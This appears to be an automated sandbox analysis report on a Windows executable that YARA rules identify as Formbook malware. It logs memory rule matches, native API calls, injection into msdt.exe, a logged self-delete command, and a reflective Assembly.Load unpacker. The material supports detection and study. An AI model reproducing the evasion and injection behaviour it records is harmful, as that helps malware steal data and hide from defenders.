          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: String function: 010BB150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CAB150 appears 54 times
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004185F0 NtCreateFile,1_2_004185F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004186A0 NtReadFile,1_2_004186A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00418720 NtClose,1_2_00418720
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004187D0 NtAllocateVirtualMemory,1_2_004187D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041869A NtReadFile,1_2_0041869A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004187CA NtAllocateVirtualMemory,1_2_004187CA
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_010F9910
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9540 NtReadFile,LdrInitializeThunk,1_2_010F9540
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F99A0 NtCreateSection,LdrInitializeThunk,1_2_010F99A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F95D0 NtClose,LdrInitializeThunk,1_2_010F95D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9840 NtDelayExecution,LdrInitializeThunk,1_2_010F9840
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_010F9860
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_010F98F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_010F9710
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_010F9780
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_010F97A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9FE0 NtCreateMutant,LdrInitializeThunk,1_2_010F9FE0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_010F9A00
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A20 NtResumeThread,LdrInitializeThunk,1_2_010F9A20
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A50 NtCreateFile,LdrInitializeThunk,1_2_010F9A50
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_010F9660
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_010F96E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9520 NtWaitForSingleObject,1_2_010F9520
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FAD30 NtSetContextThread,1_2_010FAD30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9950 NtQueueApcThread,1_2_010F9950
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9560 NtWriteFile,1_2_010F9560
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F99D0 NtCreateProcessEx,1_2_010F99D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F95F0 NtQueryInformationFile,1_2_010F95F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9820 NtEnumerateKey,1_2_010F9820
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FB040 NtSuspendThread,1_2_010FB040
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F98A0 NtWriteVirtualMemory,1_2_010F98A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9B00 NtSetValueKey,1_2_010F9B00
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA710 NtOpenProcessToken,1_2_010FA710
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9730 NtQueryVirtualMemory,1_2_010F9730
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9760 NtOpenProcess,1_2_010F9760
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9770 NtSetInformationFile,1_2_010F9770
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA770 NtOpenThread,1_2_010FA770
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA3B0 NtGetContextThread,1_2_010FA3B0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9610 NtEnumerateValueKey,1_2_010F9610
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A10 NtQuerySection,1_2_010F9A10
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9650 NtQueryValueKey,1_2_010F9650
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9670 NtQueryInformationProcess,1_2_010F9670
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A80 NtOpenDirectoryObject,1_2_010F9A80
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F96D0 NtCreateKey,1_2_010F96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE95D0 NtClose,LdrInitializeThunk,18_2_04CE95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9540 NtReadFile,LdrInitializeThunk,18_2_04CE9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE96D0 NtCreateKey,LdrInitializeThunk,18_2_04CE96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04CE96E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9650 NtQueryValueKey,LdrInitializeThunk,18_2_04CE9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04CE9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9FE0 NtCreateMutant,LdrInitializeThunk,18_2_04CE9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9780 NtMapViewOfSection,LdrInitializeThunk,18_2_04CE9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9710 NtQueryInformationToken,LdrInitializeThunk,18_2_04CE9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9840 NtDelayExecution,LdrInitializeThunk,18_2_04CE9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04CE9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE99A0 NtCreateSection,LdrInitializeThunk,18_2_04CE99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04CE9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A50 NtCreateFile,LdrInitializeThunk,18_2_04CE9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE95F0 NtQueryInformationFile,18_2_04CE95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9560 NtWriteFile,18_2_04CE9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9520 NtWaitForSingleObject,18_2_04CE9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEAD30 NtSetContextThread,18_2_04CEAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9670 NtQueryInformationProcess,18_2_04CE9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9610 NtEnumerateValueKey,18_2_04CE9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE97A0 NtUnmapViewOfSection,18_2_04CE97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9760 NtOpenProcess,18_2_04CE9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA770 NtOpenThread,18_2_04CEA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9770 NtSetInformationFile,18_2_04CE9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA710 NtOpenProcessToken,18_2_04CEA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9730 NtQueryVirtualMemory,18_2_04CE9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE98F0 NtReadVirtualMemory,18_2_04CE98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE98A0 NtWriteVirtualMemory,18_2_04CE98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEB040 NtSuspendThread,18_2_04CEB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9820 NtEnumerateKey,18_2_04CE9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE99D0 NtCreateProcessEx,18_2_04CE99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9950 NtQueueApcThread,18_2_04CE9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A80 NtOpenDirectoryObject,18_2_04CE9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A00 NtProtectVirtualMemory,18_2_04CE9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A10 NtQuerySection,18_2_04CE9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A20 NtResumeThread,18_2_04CE9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA3B0 NtGetContextThread,18_2_04CEA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9B00 NtSetValueKey,18_2_04CE9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E85F0 NtCreateFile,18_2_008E85F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E86A0 NtReadFile,18_2_008E86A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E87D0 NtAllocateVirtualMemory,18_2_008E87D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E8720 NtClose,18_2_008E8720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E869A NtReadFile,18_2_008E869A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E87CA NtAllocateVirtualMemory,18_2_008E87CA
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.253365121.00000000011E9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.257531563.00000000061E0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.257392561.0000000005CB0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000000.241151855.0000000000AF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000000.248672814.00000000004C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316078938.000000000133F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exeBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: S9yf6BkjhTQUbHE.exeReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile read: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\S9yf6BkjhTQUbHE.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@13/2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addbook.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addbook.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addcustomer.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addcustomer.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: O/InAttribu;component/views/addbook.xamle/InAttribu;component/views/borrowfrombookview.xaml[/InAttribu;component/views/borrowingview.xamlU/InAttribu;component/views/changebook.xaml]/InAttribu;component/views/changecustomer.xamlY/InAttribu;component/views/customerview.xaml]/InAttribu;component/views/deletecustomer.xamlS/InAttribu;component/views/errorview.xamlW/InAttribu;component/views/smallextras.xamlW/InAttribu;component/views/addcustomer.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: S9yf6BkjhTQUbHE.exe, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: S9yf6BkjhTQUbHE.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.S9yf6BkjhTQUbHE.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.S9yf6BkjhTQUbHE.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.S9yf6BkjhTQUbHE.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A86F9A push 00000018h; retf 0_2_00A8715A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A892F5 push ds; ret 0_2_00A89340
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A89361 push ds; retf 0_2_00A89364
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A89347 push ds; ret 0_2_00A8934C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_055256E0 push esp; iretd 0_2_055256E9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B832 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B83B push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B89C push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041533E push esp; ret 1_2_0041533F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B7E5 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004592F5 push ds; ret 1_2_00459340
